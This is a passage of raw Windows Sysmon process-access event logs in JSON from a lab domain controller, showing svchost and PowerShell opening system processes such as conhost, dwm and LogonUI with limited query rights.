C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.224\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.224","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.287\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00105E400100}\r\nTargetProcessId: 2184\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.287","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105E400100}","TargetProcessId":"2184","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.287\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00105F400100}\r\nTargetProcessId: 2192\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.287","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00105F400100}","TargetProcessId":"2192","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.287\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010F66D0100}\r\nTargetProcessId: 2320\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.287","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010F66D0100}","TargetProcessId":"2320","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.287\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00102B860100}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.287","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00102B860100}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.349\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010B6CA0000}\r\nTargetProcessId: 1268\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.349","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010B6CA0000}","TargetProcessId":"1268","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 